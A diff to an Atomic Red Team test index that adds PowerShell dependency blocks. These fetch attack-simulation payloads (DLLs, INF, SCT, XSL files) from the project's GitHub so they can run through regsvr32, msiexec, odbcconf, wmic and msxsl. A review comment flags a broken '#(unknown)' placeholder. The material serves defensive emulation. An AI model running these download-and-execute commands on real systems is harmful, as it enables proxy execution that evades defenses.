@@ -22351,6 +22690,14 @@ execution: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: command_prompt elevation_required: false @@ -22376,6 +22723,14 @@ execution: description: Location of the CSharp source_file type: Path default: PathToAtomicsFolder\T1121\src\T1121.cs + dependency_executor_name: powershell + dependencies: + - description: The CSharp source file must exist on disk at specified location + (#{source_file}) + prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}" executor: name: powershell elevation_required: false @@ -22470,6 +22825,13 @@ execution: description: Name of the local file, include path. type: Path default: PathToAtomicsFolder\T1117\RegSvr32.sct + dependency_executor_name: powershell + dependencies: + - description: Regsvr32.exe must exist on disk at specified location (#(unknown)) + prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/RegSvr32.sct" -OutFile "#(unknown)" executor: name: command_prompt elevation_required: false 
@@ -22506,6 +22868,14 @@ execution: description: Name of DLL to Execute, DLL Should export DllRegisterServer type: Path default: PathToAtomicsFolder\T1117\bin\AllTheThingsx86.dll + dependency_executor_name: powershell + dependencies: + - description: AllTheThingsx86.dll must exist on disk at specified location + (#{dll_name}) + prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" executor: name: command_prompt elevation_required: false @@ -22619,6 +22989,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false 
@@ -22637,6 +23014,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -22655,6 +23039,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false 
@@ -22674,6 +23065,13 @@ execution: description: Local location of inf file type: string default: PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf + dependency_executor_name: powershell + dependencies: + - description: Inf file must exist on disk at specified location (#{inf_to_execute}) + prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: name: command_prompt elevation_required: false @@ -23189,6 +23587,13 @@ execution: description: PID of process receiving injection type: string default: 1000 + dependency_executor_name: powershell + dependencies: + - description: T1218.dll must exist on disk at specified location (#{dll_payload}) + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}' + get_prereq_command: |- + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: name: command_prompt elevation_required: true 
@@ -23224,6 +23629,13 @@ execution:
 description: DLL to execute
 type: Path
 default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
 executor:
 name: command_prompt
 command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
@@ -23240,6 +23652,11 @@ execution:
 description: MSI file to execute
 type: Path
 default: PathToAtomicsFolder\T1218\src\Win32\T1218.msi
+ dependency_executor_name: powershell
+ dependencies:
+ - description: T1218.msi must exist on disk at specified location (#{msi_payload})
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}'
+ get_prereq_command: Write-Host "You must provide your own MSI"
 executor:
 name: command_prompt
 command: 'msiexec.exe /q /i "#{msi_payload}"
@@ -23274,6 +23691,13 @@ execution:
 description: DLL to execute
 type: Path
 default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
 executor:
 name: command_prompt
 command: 'msiexec.exe /y "#{dll_payload}"
@@ -23290,6 +23714,13 @@ execution:
 description: DLL to execute
 type: Path
 default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
 executor:
 name: command_prompt
 command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
@@ -23307,6 +23738,13 @@ execution:
 description: Local location of inf file
 type: string
 default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf
+ dependency_executor_name: powershell
+ dependencies:
+ - description: INF file must exist on disk at specified location (#{inf_to_execute})
+ prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
 executor:
 name: command_prompt
 elevation_required: false
@@ -23766,6 +24204,13 @@ execution:
 description: Location of the project file
 type: Path
 default: PathToAtomicsFolder\T1127\src\T1127.csproj
+ dependency_executor_name: powershell
+ dependencies:
+ - description: Project file must exist on disk at specified location (#(unknown))
+ prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#(unknown)"
 executor:
 name: command_prompt
 elevation_required: false
@@ -24384,6 +24829,18 @@ execution:
 description: Location of the test XSL script file on the local filesystem.
 type: Path
 default: PathToAtomicsFolder\T1220\src\msxslscript.xsl
+ dependency_executor_name: powershell
+ dependencies:
+ - description: XML file must exist on disk at specified location (#{xmlfile})
+ prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}"
+ - description: XSL file must exist on disk at specified location (#{xslfile})
+ prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}"
 executor:
 name: command_prompt
 command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
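Review bot: The T1127 dependency block references its input as `#(unknown)` in the description, `prereq_command` and `get_prereq_command`, whereas every other block on this page uses a `#{name}` placeholder that the executor substitutes. If that string is really in the generated YAML rather than an artifact of this rendering, the existence check and the `-OutFile` target become the literal text `#(unknown)`, and the dependency can never resolve to the `T1127.csproj` path declared as the default a few lines above. Confirm the input name in the T1127 source yaml and regenerate, e.g. `prereq_command: 'if (Test-Path "#{<input_name>}") {exit 0} else {exit 1}'` with the real input name in place of the placeholder.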
@@ -24427,6 +24884,13 @@ execution:
 description: Location of the test XSL script file on the local filesystem.
 type: path
 default: PathToAtomicsFolder\T1220\src\wmicscript.xsl
+ dependency_executor_name: powershell
+ dependencies:
+ - description: XSL file must exist on disk at specified location (#{local_xsl_file})
+ prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}"
 executor:
 name: command_prompt
 command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}